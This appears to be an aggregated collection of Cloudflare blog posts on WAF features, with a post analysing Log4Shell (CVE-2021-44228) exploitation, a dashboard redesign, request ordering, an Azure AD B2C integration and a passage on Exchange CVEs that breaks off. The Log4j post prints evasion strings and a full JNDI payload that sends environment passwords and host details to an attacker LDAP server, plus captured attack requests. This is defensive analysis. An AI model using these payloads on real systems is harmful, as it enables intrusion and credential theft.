If you are on a FREE plan, you are already receiving protection. Over the coming months, all our FREE zone plan users will also receive access to the Cloudflare WAF user interface in the dashboard and will be able to deploy and configure the new ruleset. This ruleset will provide mitigation rules for high profile vulnerabilities such as Shellshock and Log4J among others.

To access our broader set of WAF rulesets (Cloudflare Managed Rules, Cloudflare OWASP Core Ruleset and Cloudflare Leaked Credential Check Ruleset) along with advanced WAF features, customers will still have to upgrade to PRO or higher plans.

The Challenge

With over 32 million HTTP requests per second being proxied by the Cloudflare global network, running the WAF on every single request is no easy task.

WAFs secure all HTTP request components, including bodies, by running a set of rules, sometimes referred to as signatures, that look for specific patterns that could represent a malicious payload. These rules vary in complexity, and the more rules you have, the harder the system is to optimize. Additionally, many rules take advantage of regex capabilities, allowing the author to perform complex matching logic.
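
As a deliberately naive illustration of what a signature-style check looks like (this toy pattern is ours for illustration, not one of Cloudflare's actual rules):

import java.util.regex.Pattern;

public class SignatureSketch {
    // A deliberately naive SQLi signature; real rules are far more nuanced.
    private static final Pattern NAIVE_SQLI =
        Pattern.compile("(?i)union\\s+select|or\\s+1=1");

    public static void main(String[] args) {
        System.out.println(NAIVE_SQLI.matcher("id=1 OR 1=1").find()); // prints: true
    }
}

A single request may be checked against thousands of such patterns, each far more complex than this one, which is where the optimization challenge lies.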

All of this needs to happen with a negligible latency impact, as security should not come with a performance penalty and many application owners come to Cloudflare for performance benefits.

By leveraging our new Edge Rules Engine, on top of which the new WAF has been built, we have been able to reach the performance and memory milestones that make us feel comfortable and that allow us to provide a good baseline WAF protection to everyone. Enter the new Cloudflare Free Managed Ruleset.

The Free Cloudflare Managed Ruleset

This ruleset is automatically deployed on any new Cloudflare zone and is specially designed to reduce false positives to a minimum across a very broad range of traffic types. Customers will be able to disable the ruleset, if necessary, or configure the traffic filter or individual rules. As of today, the ruleset contains the following rules:

  • Log4J rules matching payloads in the URI and HTTP headers;
  • Shellshock rules;
  • Rules matching very common WordPress exploits;

Whenever a rule matches, an event will be generated in the Security Overview tab, allowing you to inspect the request.

Deploying and configuring

For all new FREE zones, the ruleset will be automatically deployed. The rules are battle tested across the Cloudflare network and are safe to deploy on most applications out of the box. Customers can, in any case, configure the ruleset further by:

  • Overriding all rules to LOG or other action.
  • Overriding specific rules only to LOG or other action.
  • Completely disabling the ruleset or any specific rule.

All options are easily accessible via the dashboard, but can also be performed via API. Documentation on how to configure the ruleset, once it is available in the UI, will be found on our developer site.

What’s next?

The Cloudflare Free Managed Ruleset will be updated by Cloudflare whenever a relevant wide-ranging vulnerability is discovered. Updates to the ruleset will be published on our change log, so that customers can keep up to date with any new rules.

We love building cool new technology. But we also love making it widely available and easy to use. We’re really excited about making the web much safer for everyone with a WAF that won’t cost you a dime. If you’re interested in getting started, just head over here to sign up for our free plan.

Improving the WAF with Machine Learning

Post Syndicated from Daniele Molteni original https://blog.cloudflare.com/waf-ml/

Improving the WAF with Machine Learning

Improving the WAF with Machine Learning

Cloudflare handles 32 million HTTP requests per second and is used by more than 22% of all the websites whose web server is known by W3Techs. Cloudflare is in the unique position of protecting traffic for 1 out of 5 Internet properties which allows it to identify threats as they arise and track how these evolve and mutate.

The Web Application Firewall (WAF) sits at the core of Cloudflare’s security toolbox, and Managed Rules are a key feature of the WAF. They are a collection of rules created by Cloudflare’s analyst team that block requests when they show patterns of known attacks. These managed rules work extremely well for patterns of established attack vectors, as they have been extensively tested to minimize both false negatives (missing an attack) and false positives (flagging an attack when there isn’t one). On the downside, managed rules often miss attack variations (also known as bypasses), as static regex-based rules are intrinsically sensitive to signature variations introduced, for example, by fuzzing techniques.

We witnessed this issue when we released protections for Log4j. For a few days after the vulnerability was made public, we had to constantly update the rules to match variations and mutations as attackers tried to bypass the WAF. Moreover, optimizing rules requires significant human intervention, and it usually happens only after bypasses have been identified or even exploited, making the protection reactive rather than proactive.

Today we are excited to complement managed rulesets (such as OWASP and Cloudflare Managed) with a new tool aimed at identifying bypasses and malicious payloads without human involvement, and before they are exploited. Customers can now access signals from a machine learning model trained on the good/bad traffic as classified by managed rules and augmented data to provide better protection across a broader range of old and new attacks.

Welcome to our new Machine Learning WAF detection.

The new detection is available in Early Access for Enterprise, Pro and Biz customers. Please join the waitlist if you are interested in trying it out. In the long term, it will be available to the higher tier customers.

Improving the WAF with learning capabilities

The new detection system complements existing managed rulesets by providing three major advantages:

  1. It runs on all of your traffic. Each request is scored based on the likelihood that it contains a SQLi or XSS attack, for example. This enables a new WAF analytics experience that allows you to explore trends and patterns in your overall traffic.
  2. Detection rate improves based on past traffic and feedback. The model is trained on good and bad traffic as categorized by managed rules across all Cloudflare traffic. This allows small sites to get the same level of protection as the largest Internet properties.
  3. A new definition of performance. The machine learning engine identifies bypasses and anomalies before they are exploited or identified by human researchers.

The secret sauce is a combination of innovative machine learning modeling, a vast training dataset built on the attacks we block daily as well as data augmentation techniques, the right evaluation and testing framework based on the behavioral testing principle and cutting-edge engineering that allows us to assess each request with negligible latency.

A new WAF experience

The new detection is based on the paradigm launched with Bot Analytics. Following this approach, each request is evaluated, and a score assigned, regardless of whether we are taking actions on it. Since we score every request, users can visualize how the score evolves over time for the entirety of the traffic directed to their server.

[Figure: evolution of the WAF attack score over time across all traffic]

Furthermore, users can visualize the histogram of how requests were scored for a specific attack vector (such as SQLi) and find what score is a good value to separate good from bad traffic.

The actual mitigation is performed with custom WAF rules where the score is used to decide which requests should be blocked. This allows customers to create rules whose logic includes any parameter of the HTTP requests, including the dynamic fields populated by Cloudflare, such as bot scores.

[Figure: a custom WAF rule using the attack score to block requests]

We are now looking at extending this approach to the managed rules too (OWASP and Cloudflare Managed). Customers will be able to identify trends and create rules based on patterns that are visible when looking at their overall traffic, rather than creating rules by trial and error, logging traffic to validate them, and only then enforcing protection.

How does it work?

Machine learning–based detections complement the existing managed rulesets, such as OWASP and Cloudflare Managed. The system is based on models designed to identify variations of attack patterns and anomalies without the direct supervision of researchers or the end user.

As of today, we expose scores for two attack vectors: SQL injection and Cross Site Scripting. Users can create custom WAF/Firewall rules using three separate scores: a total score (cf.waf.ml.score), one for SQLi and one for XSS (cf.waf.ml.score.sqli, cf.waf.ml.score.xss, respectively). The scores can have values between 1 and 99, with 1 being definitely malicious and 99 being valid traffic.
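
For example, a custom rule built on these fields might look like the following (a sketch only; the threshold of 15 is illustrative, and the histogram view described above is the right way to pick a value for your own traffic):

(cf.waf.ml.score.sqli lt 15)

Deployed with a Block action, this would block requests that the model scores as likely SQL injection.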

[Figure: the attack score scale, from 1 (definitely malicious) to 99 (likely clean)]

The model is then trained based on traffic classified by the existing WAF rules, and it works on a transformed version of the original request, making it easier to identify fingerprints of attacks.

For each request, the model scores each part of the request independently so that it’s possible to identify where malicious payloads were identified, for example, in the body of the request, the URI or headers.

[Figure: per-component scores identifying where in the request a malicious payload was found]

This looks easy on paper, but there are a number of challenges that Cloudflare engineers had to solve to get here. These include how to build a reliable dataset, scalable data labeling, selecting the right model architecture, and the requirement to run the categorization on every request processed by Cloudflare’s global network (i.e. 32 million times per second).

In the coming weeks, the Engineering team will publish a series of blog posts which will give a better understanding of how the solution works under the hood.

Looking forward

In the coming months, we are going to release the new detection engine to customers and collect their feedback on its performance. Long term, we are planning to extend the detection engine to cover all attack vectors already identified by managed rules, and to use the attacks blocked by the machine learning model to further improve our managed rulesets.

A new WAF experience

Post Syndicated from Zhiyuan Zheng original https://blog.cloudflare.com/new-waf-experience/

A new WAF experience

A new WAF experience

Around three years ago, we brought multiple features into the Firewall tab in our dashboard navigation, with the motivation “to make our products and services intuitive.” Having greatly expanded our capabilities in the past three years, we want to take another opportunity to evaluate the intuitiveness of the Cloudflare WAF (Web Application Firewall).

Our customers lead the way to new WAF

The security landscape is moving fast, types of web applications are growing rapidly, and within the industry there are various approaches to what a WAF includes and can offer. Cloudflare proxies not only enterprise applications, but also millions of personal blogs, community sites, and small business stores. This diversity of use cases is covered by the various products we offer; however, these products are currently scattered, which makes it unclear which protection rules are active. This pushes us to reflect on how we can best support our customers in getting the most value out of the WAF by providing a clearer offering that meets expectations.

A few months ago, we reached out to our customers to answer a simple question: what do you consider to be part of WAF? We employed a range of user research methods including card sorting, tree testing, design evaluation, and surveys to help with this. The results of this research illustrated how our customers think about WAF, what it means to them, and how it supports their use cases. This inspired the product team to expand scope and contemplate what (Web Application) Security means, beyond merely the WAF.

Based on what hundreds of customers told us, our user research and product design teams collaborated with product management to rethink the security experience. We examined our assumptions and assessed the effectiveness of design concepts to create a structure (or information architecture) that reflected our customers’ mental models.

This new structure consolidates firewall rules, managed rules, and rate limiting rules to become a part of WAF. The new WAF strives to be the one-stop shop for web application security as it pertains to differentiating malicious from clean traffic.

As of today, you will see the following changes to our navigation:

  1. Firewall is being renamed to Security.
  2. Under Security, you will now find WAF.
  3. Firewall rules, managed rules, and rate limiting rules will now appear under WAF.

From now on, when we refer to WAF, we will be referring to the above three features.

Further, some important updates are coming for these features. Advanced rate limiting rules will be launched as part of Security Week, and every customer will also get a free set of managed rules to protect all traffic from high profile vulnerabilities. And finally, in the next few months, firewall rules will move to the Ruleset Engine, adding more powerful capabilities thanks to the new Ruleset API. Feeling excited?

How customers shaped the future of WAF

Almost 500 customers participated in this user research study that helped us learn about needs and context of use. We employed four research methods, all of which were conducted in an unmoderated manner; this meant people around the world could participate remotely at a time and place of their choosing.

  • Card sorting involved participants grouping navigational elements into categories that made sense to them.
  • Tree testing assessed how well or poorly a proposed navigational structure performed for our target audience.
  • Design evaluation involved a task-based approach to measure effectiveness and utility of design concepts.
  • Survey questions helped us dive deeper into results, as well as painting a picture of our participants.

Results of this four-pronged study informed changes to both WAF and Security that are detailed below.

The new WAF experience

The final result reveals the WAF as part of a broader Security category, which also includes Bots, DDoS, API Shield and Page Shield. This destination enables you to create your rules (a.k.a. firewall rules), deploy Cloudflare managed rules, set rate limit conditions, and includes handy tools to protect your web applications.

All customers across all plans will now see the WAF products organized as below:

[Figure: the WAF products organized under the new Security section]
  1. Firewall rules allow you to create custom, user-defined logic by blocking or allowing traffic that leverages all the components of the HTTP requests and dynamic fields computed by Cloudflare, such as Bot score.
  2. Rate limiting rules include the traditional IP-based product we launched back in 2018 and the newer Advanced Rate Limiting for ENT customers on the Advanced plan (coming soon).
  3. Managed rules allow customers to deploy sets of rules managed by the Cloudflare analyst team. These rulesets include a “Cloudflare Free Managed Ruleset” currently being rolled out for all plans including FREE, as well as Cloudflare Managed, the OWASP implementation, and Exposed Credentials Check for all paying plans.
  4. Tools give access to IP Access Rules, Zone Lockdown and User Agent Blocking. Although still actively supported, these products cover specific use cases that can also be addressed using firewall rules. However, they remain a part of the WAF toolbox for convenience.

Redesigning the WAF experience

Gestalt design principles suggest that “elements which are close in proximity to each other are perceived to share similar functionality or traits.” This principle in addition to the input from our customers informed our design decisions.

After reviewing the responses of the study, we understood the importance of making it easy to find the security products in the Dashboard, and the need to make it clear how particular products were related to or worked together with each other.

Crucially, the page needed to:

  • Display each type of rule we support, i.e. firewall rules, rate limiting rules and managed rules
  • Show the usage amount of each type
  • Give the customer the ability to add a new rule and manage existing rules
  • Allow the customer to reprioritise rules using the existing drag and drop behavior
  • Be flexible enough to accommodate future additions and consolidations of WAF features

We iterated on multiple options, including predominantly vertical page layouts, table based page layouts, and even accordion based page layouts. Each of these options, however, would force us to replicate buttons of similar functionality on the page. With the risk of causing additional confusion, we abandoned these options in favor of a horizontal, tabbed page layout.

How can I get it?

As of today, we are launching this new design of WAF to everyone! In the meantime, we are updating documentation to walk you through how to maximize the power of Cloudflare WAF.

Looking forward

This is a starting point of our journey to make Cloudflare WAF not only powerful but also easy to adapt to your needs. We are evaluating approaches to empower your decision-making process when protecting your web applications. As threat intelligence grows and rule creation possibilities expand, we want to shorten your path from detecting a possible threat (for example, in the Security Overview) to setting up the right rule to mitigate it. Stay tuned!

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

In this blog post we will cover WAF evasion patterns and exfiltration attempts seen in the wild, trend data on attempted exploitation, and information on exploitation that we saw prior to the public disclosure of CVE-2021-44228.

In short, we saw limited testing of the vulnerability on December 1, eight days before public disclosure. We saw the first attempt to exploit the vulnerability just nine minutes after public disclosure, showing just how fast attackers exploit newly found problems.

We also see mass attempts to evade WAFs that have tried to perform simple blocking, and mass attempts to exfiltrate data, including secret credentials and passwords.

WAF Evasion Patterns and Exfiltration Examples

Since the disclosure of CVE-2021-44228 (now commonly referred to as Log4Shell) we have seen attackers go from using simple attack strings to actively trying to evade blocking by WAFs. WAFs provide a useful tool for stopping external attackers and WAF evasion is commonly attempted to get past simplistic rules.

In the earliest stages of exploitation of the Log4j vulnerability, attackers were using un-obfuscated strings typically starting with ${jndi:dns, ${jndi:rmi and ${jndi:ldap, and simple rules looking for those patterns were effective.

Those strings were quickly blocked, however, and attackers switched to using evasion techniques. They used, and are using, both standard evasion techniques (escaping or encoding of characters) and tailored evasions specific to the Log4j Lookups language.

Any capable WAF will be able to handle the standard techniques. Tricks like encoding ${ as %24%7B or \u0024\u007b are easily reversed before applying rules to check for the specific exploit being used.
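
As a minimal sketch of that normalization step (illustrative only, not Cloudflare's actual pipeline), percent-decoding alone reverses the first of those tricks:

import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

public class DecodeDemo {
    public static void main(String[] args) {
        // Percent-decoding reverses the %24%7B obfuscation: this prints "${jndi:"
        System.out.println(URLDecoder.decode("%24%7Bjndi%3A", StandardCharsets.UTF_8));
    }
}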

However, the Log4j language has some rich functionality that enables obscuring the key strings that some WAFs look for. For example, the ${lower} lookup will lowercase a string. So, ${lower:H} would turn into h. Using lookups attackers are disguising critical strings like jndi helping to evade WAFs.

In the wild we are seeing use of ${date}, ${lower}, ${upper}, ${web}, ${main} and ${env} for evasion. Additionally, ${env}, ${sys} and ${main} (and other specialized lookups for Docker, Kubernetes and other systems) are being used to exfiltrate data from the target process’ environment (including critical secrets).

To better understand how this language is being used, here is a small Java program that takes a string on the command-line and logs it to the console via Log4j:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4jTester{
    private static final Logger logger = LogManager.getLogger(log4jTester.class);
       
    public static void main(String[] args) {
	logger.error(args[0]);
    }
}

This simple program writes to the console. Here it is logging the single word hide.

$ java log4jTester.java 'hide'          
01:28:25.606 [main] ERROR log4jTester - hide

The Log4j language allows use of ${} inside ${}, thus attackers are able to combine multiple different keywords for evasion. For example, the following ${lower:${lower:h}}${lower:${upper:i}}${lower:D}e would be logged as the word hide. That makes it easy for an attacker to evade simplistic searching for ${jndi, for example, as the letters of jndi can be hidden in a similar manner.

$ java log4jTester.java '${lower:${lower:h}}${lower:${upper:i}}${lower:d}e'
01:30:42.015 [main] ERROR log4jTester - hide

The other major evasion technique makes use of the :- syntax. That syntax enables the attacker to set a default value for a lookup and if the value looked up is empty then the default value is output. So, for example, looking up a non-existent environment variable can be used to output letters of a word.

$ java log4jTester.java '${env:NOTEXIST:-h}i${env:NOTEXIST:-d}${env:NOTEXIST:-e}' 
01:35:34.280 [main] ERROR log4jTester - hide

Similar techniques are in use with ${web}, ${main}, etc. as well as strings like ${::-h} or ${::::::-h} which both turn into h. And, of course, combinations of these techniques are being put together to make more and more elaborate evasion attempts.

To get a sense for how evasion has taken off, here’s a chart showing un-obfuscated ${jndi: appearing in WAF blocks (the orange line), the use of the ${lower} lookup (green line), use of URI encoding (blue line) and one particular evasion that’s become popular, ${${::-j}${::-n}${::-d}${::-i} (red line).

[Figure: WAF blocks over time for un-obfuscated ${jndi:, the ${lower} lookup, URI encoding, and the ${${::-j}${::-n}${::-d}${::-i} evasion]

For the first couple of days evasion was relatively rare. Now, however, although naive strings like ${jndi: remain popular evasion has taken off and WAFs must block these improved attacks.

We wrote last week about the initial phases of exploitation that were mostly about reconnaissance. Since then attackers have moved on to data extraction.

We see the use of ${env} to extract environment variables, and ${sys} to get information about the system on which Log4j is running. One attack, blocked in the wild, attempted to exfiltrate a lot of data from various Log4j lookups:

${${env:FOO:-j}ndi:${lower:L}da${lower:P}://x.x.x.x:1389/FUZZ.HEADER.${docker:
imageName}.${sys:user.home}.${sys:user.name}.${sys:java.vm.version}.${k8s:cont
ainerName}.${spring:spring.application.name}.${env:HOSTNAME}.${env:HOST}.${ctx
:loginId}.${ctx:hostName}.${env:PASSWORD}.${env:MYSQL_PASSWORD}.${env:POSTGRES
_PASSWORD}.${main:0}.${main:1}.${main:2}.${main:3}}

There you can see the user, home directory, Docker image name, details of Kubernetes and Spring, passwords for the user and databases, hostnames and command-line arguments being exfiltrated.

Because of the sophistication of both evasion and exfiltration, WAF vendors need to treat any occurrence of ${ as suspicious. For this reason, we are additionally offering to sanitize any logs we send our customers, converting ${ to x{.
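
The substitution itself is deliberately simple; a sketch of the idea:

public class LogSanitizer {
    // Replace the Log4j lookup opener so logged payloads cannot be re-interpreted.
    public static String sanitize(String logLine) {
        return logLine.replace("${", "x{");
    }

    public static void main(String[] args) {
        // Prints: GET /?x=x{jndi:ldap://evil/a}
        System.out.println(sanitize("GET /?x=${jndi:ldap://evil/a}"));
    }
}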

The Cloudflare WAF team is continuously working to block attempted exploitation but it is still vital that customers patch their systems with up to date Log4j or apply mitigations. Since data that is logged does not necessarily come via the Internet systems need patching whether they are Internet-facing or not.

All paid customers have configurable WAF rules to help protect against CVE-2021-44228, and we have also deployed protection for our free customers.

Cloudflare quickly put in place WAF rules to help block these attacks. The following chart shows how those blocked attacks evolved.

[Figure: blocked Log4j exploitation requests over time]

From December 10 to December 13 we saw the number of blocks per minute ramp up as follows.

Date Mean blocked requests per minute
2021-12-10 5,483
2021-12-11 18,606
2021-12-12 27,439
2021-12-13 24,642

In our initial blog post we noted that Canada (the green line below) was the top source country for attempted exploitation. As we predicted, that did not continue, and attacks are now coming from all over the world, either directly from servers or via proxies.

[Figure: attempted exploitation by source country over time]

Exploitation of CVE-2021-44228 prior to disclosure

CVE-2021-44228 was disclosed in a (now deleted) Tweet on 2021-12-09 14:25 UTC:

[Image: the now-deleted Tweet disclosing CVE-2021-44228]

However, our systems captured three instances of attempted exploitation or scanning on December 1, 2021 as follows. In each of these I have obfuscated IP addresses and domain names. These three injected ${jndi:ldap} lookups in the HTTP User-Agent header, the Referer header and in URI parameters.

2021-12-01 03:58:34
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://rb3w24.example.com/x}
Referer: /${jndi:ldap://rb3w24.example.com/x}
Path: /$%7Bjndi:ldap://rb3w24.example.com/x%7D

2021-12-01 04:36:50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://y3s7xb.example.com/x}
Referer: /${jndi:ldap://y3s7xb.example.com/x}
Parameters: x=$%7Bjndi:ldap://y3s7xb.example.com/x%7D						

2021-12-01 04:20:30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://vf9wws.example.com/x}
Referer: /${jndi:ldap://vf9wws.example.com/x}	
Parameters: x=$%7Bjndi:ldap://vf9wws.example.com/x%7D	

After those three attempts we saw no further activity until nine minutes after public disclosure when someone attempts to inject a ${jndi:ldap} string via a URI parameter on a gaming website.

2021-12-09 14:34:31
Parameters: redirectUrl=aaaaaaa$aadsdasad$${jndi:ldap://log4.cj.d.example.com/exp}

Conclusion

CVE-2021-44228 is being actively exploited by a large number of actors. WAFs are effective as a measure to help prevent attacks from the outside, but they are not foolproof, and attackers are actively working on evasions. The potential for exfiltration of data and credentials is incredibly high, and the long-term risks of more devastating hacks and attacks are very real.

It is vital to mitigate and patch affected software that uses Log4j now and not wait.

Traffic Sequence: Which Product Runs First?

Post Syndicated from Sam Marsh original https://blog.cloudflare.com/traffic-sequence-which-product-runs-first/

Traffic Sequence: Which Product Runs First?

Traffic Sequence: Which Product Runs First?

“Which came first, the chicken or the egg?” It’s one of life’s great questions. There are hundreds of articles published which conclude with eggs predating chickens by millions of years. Unfortunately, Cloudflare users don’t have New Scientist on hand to answer similar questions.

Which runs first, Firewall Rules or Workers? Page Rules or Transform Rules? Whilst not as philosophically challenging, the answers to these questions are key to setting up your Cloudflare zone correctly. Answering them has become increasingly difficult as more and more functionality is added, thanks to our incredible rate of shipping products. What was once a relatively easy-to-understand traffic flow exploded in complexity with the introduction of products such as Workers, Load Balancing Rules and Transform Rules. And this big bang of product announcements is only accelerating each year.

To begin addressing this problem, we developed Traffic Sequence. Traffic Sequence is a simple dashboard illustration which shows a default, high-level overview of how Cloudflare products interact. Think of this as your atlas, rather than your black cab driver’s “Knowledge”. This helps you understand that London is in the south east of the UK, but not that it’s quicker to walk than use the London Underground between Leicester Square and Covent Garden.

[Figure: the Traffic Sequence illustration in the dashboard]

Traffic Sequence is now enabled for all zones by default, appearing on ten product pages within the dashboard. Traffic Sequence highlights in blue the product area you are currently configuring, showing where within the HTTP request lifecycle the specific product sits. This provides context and allows users to understand which products will see the impact of changes here, and which products will not.

Traffic Sequence is designed to make Cloudflare’s edge clearer to our customers, allowing users to understand how products fit together and understand how HTTP requests flow between each.

Dear Cloudflare, which runs first?

Understanding how traffic is routed through Cloudflare has been one of the most common questions from both Cloudflare staff and customers alike.

But why does it matter? Let’s go through a simple example.

Released in April 2021, “Transform Rules” lets users rewrite URLs of HTTP requests as they proxy through their zone — for example, rewriting /login.php to /super/secret/login-page.php, all invisible to the end user.

In this scenario, the administrator also has a Firewall Rule blocking requests to the URI Path /login.php when the visitor is coming from a country other than the United States. What they would see, however, is that visitors from these other countries are still reaching the /login.php page on their servers. Why is this?

This is because URL rewrites happen before Firewall Rules, meaning the Firewall Rules product won’t see a URI Path of /login.php. Instead it will see HTTP requests with the rewritten URI path of /super/secret/login-page.php. Thus, when Firewall Rules evaluates the customers rule it checks:

  1. Is this from a country that is not the USA? Yes
  2. AND – Is this request going to a URI Path of /login.php? No.

As the two criteria are not both true, the rule does not match and the traffic is allowed on its journey.

This is why it is so important to know how Cloudflare’s products interoperate to get the most out of your plan, and achieve your goals without having to dig through mountains of documentation.

In an alternate timeline, Traffic Sequence is used to highlight that Firewall Rules run after URL rewriting occurs, and therefore see the rewritten value in the URI Path. With this information, the customer can then configure a Firewall Rule to look for the rewritten value in the URI Path and accomplish their desired setup.
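
A sketch of that corrected rule, written as a Firewall Rules expression using the rewritten path from the example above:

(ip.geoip.country ne "US" and http.request.uri.path eq "/super/secret/login-page.php")

Paired with a Block action, this matches the request as Firewall Rules actually sees it, after the URL rewrite has run.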

From napkin to working prototype

Traffic Sequence was originally born out of a “back of the napkin” idea during the creation of Transform Rules and URL Normalization, in an attempt to show where these transformations were happening:

[Image: early sketch of the Traffic Sequence concept]

The idea might have started from a need of our own, but it ended up addressing well known customer and internal problems: whenever we build a new product everyone wants to understand how it fits into the big picture. So we pushed the idea further, proposing it to other teams and soliciting feedback.

This project was a great example of how an idea brought to the table at the right level of fidelity can evolve into an opportunity to ship and learn. Something initially meant as an explainer diagram for one rule type has become an almost bespoke dashboard experience: it is unique to each customer’s Cloudflare environment, displaying only the products available for use in that zone. We offer many options and routes to products, but until now we didn’t have a straightforward flow of information that customers could rely on, focused only on what they have set up and have access to.

As part of the design process, we try to focus on asking lots of questions rather than just finding an answer. Some of the considerations we had were:

  • What if we show customers a product they aren’t using?
  • What if we show customers a product they aren’t entitled to on their plan level?
  • Why aren’t we showing “this product”?
  • Do we have this visualisation on by default?

After gaining internal momentum to flesh out this project, we decided to focus on three areas:

  1. Simplifying a complex ecosystem – what is a useful simplification?
  2. Value that this will add beyond this first application
  3. Opportunity to test out different navigation and mental models.

After all, this is not just a map of our system, but a new way of navigating it entirely.

Positive early internal feedback not only aligned with our goals, but allowed us to iterate on points that needed improvement. We knew that this could be a game-changer for promoting clarity, improving discoverability and saving time with navigation: going for one click instead of three for most items.

[Figure: an early Traffic Sequence prototype]

A couple of iterations later, we were ready to put this in the hands of our users for early testing:


Thanks to our incredible community, we had a high level of interest in the first week, providing insight into how this feature would be used in the real world and answering, via our Traffic Sequence survey form, the ultimate question of this experiment: “Does this solve the problem of understanding how Cloudflare handles HTTP requests?”

  • “I didn’t know where my requests were going… until now.”
  • “It’s always been confusing which products/features affect which other products/features.”
  • “It’s really handy to be able to explain the ordering that these are happening in, and I like the deeplink into the relevant area.”

These were all a great reminder that what triggered this work was ingrained in real customer needs.

Other feedback was rapidly incorporated into the prototype; specifically splitting Transform Rules into two separate sections to highlight that URL rewrites and header modifications occur at different parts of the request flow. We also added features which our users deemed important for clarity, such as IP Access Rules.

Traffic Sequence for all

Thanks to the great feedback and participation of all testers, both internal and external, we are now in a position where we are comfortable to take the covers off and make Traffic Sequence available to all users.

[Figure: Traffic Sequence now available to all users]

The visualisation can be hidden easily by clicking on the “hide” button, and the display automatically hides to preserve critical whitespace when needed:

[Figure: the Traffic Sequence visualisation collapsed to preserve whitespace]

When new products are added, or updates to products occur which modify the traffic order, this diagram will be updated accordingly.

Evolving Traffic Sequence

We know this is a high level, generic overview of how Cloudflare products interact. There is a level of nuance underneath, and a number of products and features not shown in the Traffic Sequence illustration which play an important part in keeping users safe and secure.

In the future we have aspirations to build “the other side of the coin”. Traffic Sequence provides a simple-to-understand, high-level view of how the products work by default. We also want to create a detailed, almost traceroute-like feature which allows users to see exactly what happens to their traffic: which products it goes via, what happens within those products, and potentially a lot more. Stay tuned!

Try it now

This feature is now enabled by default on all customer zones, and is visible within the dashboard locations outlined above.

Please do try it out and let us know what you think via the Cloudflare Community.

Enable secure access to applications with Cloudflare WAF and Azure Active Directory

Post Syndicated from Abhi Das original https://blog.cloudflare.com/cloudflare-waf-integration-azure-active-directory/

Cloudflare and Microsoft Azure Active Directory have partnered to provide an integration specifically for web applications using Azure Active Directory B2C. From today, customers using both services can follow the simple integration steps to protect B2C applications with Cloudflare’s Web Application Firewall (WAF) on any custom domain. Microsoft has detailed this integration as well.

Cloudflare Web Application Firewall

The Web Application Firewall (WAF) is a core component of the Cloudflare platform and is designed to keep any web application safe. It blocks more than 70 billion cyber threats per day. That is 810,000 threats blocked every second.


The WAF is available through an intuitive dashboard or a Terraform integration, and it enables users to build powerful rules. Every request to the WAF is inspected against the rule engine and the threat intelligence built from protecting approximately 25 million internet properties. Suspicious requests can be blocked, challenged or logged as per the needs of the user, while legitimate requests are routed to the destination regardless of where the application lives (i.e., on-premise or in the cloud). Analytics and Cloudflare Logs enable users to view actionable metrics.

The Cloudflare WAF is an intelligent, integrated, and scalable solution to protect business-critical web applications from malicious attacks, with no changes to customers’ existing infrastructure.

Azure AD B2C

Azure AD B2C is a customer identity management service that enables custom control of how your customers sign up, sign in, and manage their profiles when using iOS, Android, .NET, single-page (SPA), and other applications and web experiences. It uses standards-based authentication protocols including OpenID Connect, OAuth 2.0, and SAML. You can customize the entire user experience with your brand so that it blends seamlessly with your web and mobile applications. It integrates with most modern applications and commercial off-the-shelf software, providing business-to-customer identity as a service.

Customers of businesses of all sizes use their preferred social, enterprise, or local account identities to get single sign-on access to their applications and APIs. It takes care of the scaling and safety of the authentication platform, monitoring and automatically handling threats like denial-of-service, password spray, or brute force attacks.

Integrated solution

When setting up Azure AD B2C, many customers prefer to customize their authentication endpoint by hosting the solution under their own domain — for example, under store.example.com — rather than using a Microsoft owned domain. With the new partnership and integration, customers can now place the custom domain behind Cloudflare’s Web Application Firewall while also using Azure AD B2C, further protecting the identity service from sophisticated attacks.

This defense-in-depth approach allows customers to leverage both Cloudflare WAF capabilities along with Azure AD B2C native Identity Protection features to defend against cyberattacks.

Instructions on how to set up the integration are provided on the Azure website, and all it requires is a Cloudflare account.


Customer benefit

Azure customers need support for a strong set of security and performance tools once they implement Azure AD B2C in their environment. Integrating Cloudflare Web Application Firewall with Azure AD B2C can give customers the ability to write custom security rules (including rate limiting rules), apply DDoS mitigation, and deploy advanced bot management features. The Cloudflare WAF works by proxying and inspecting traffic towards your application and analyzing the payloads to ensure only non-malicious content reaches your origin servers. By incorporating the Cloudflare integration into Azure AD B2C, customers can ensure that their application is protected against sophisticated attack vectors including zero-day vulnerabilities, malicious automated botnets, and other generic attacks such as those listed in the OWASP Top 10.

Conclusion

This integration is a great match for any B2C businesses that are looking to enable their customers to authenticate themselves in the easiest and most secure way possible.

Please give it a try and let us know how we can improve it, and reach out to us with other use cases for your applications on Azure. Register here to share your interest and feedback on the Azure integration, and to hear about upcoming webinars on this topic.

Protecting against recently disclosed Microsoft Exchange Server vulnerabilities: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065

Post Syndicated from Patrick R. Donahue original https://blog.cloudflare.com/protecting-against-microsoft-exchange-server-cves/

Enabling the Cloudflare WAF and Cloudflare Specials ruleset protects against exploitation of unpatched CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

Cloudflare has deployed managed rules protecting customers against a series of remotely exploitable vulnerabilities that were recently found in Microsoft Exchange Server. Web Application Firewall customers with the Cloudflare Specials ruleset enabled are automatically protected against CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

If you are running Exchange Server 2013, 2016, or 2019, and do not have the Cloudflare Specials ruleset enabled, we strongly recommend that you do so. You should also follow Microsoft’s urgent recommendation to patch your on-premise systems immediately. These vulnerabilities are actively being exploited in the wild by attackers to exfiltrate email inbox content and move laterally within organizations’ IT systems.

Edge Mitigation

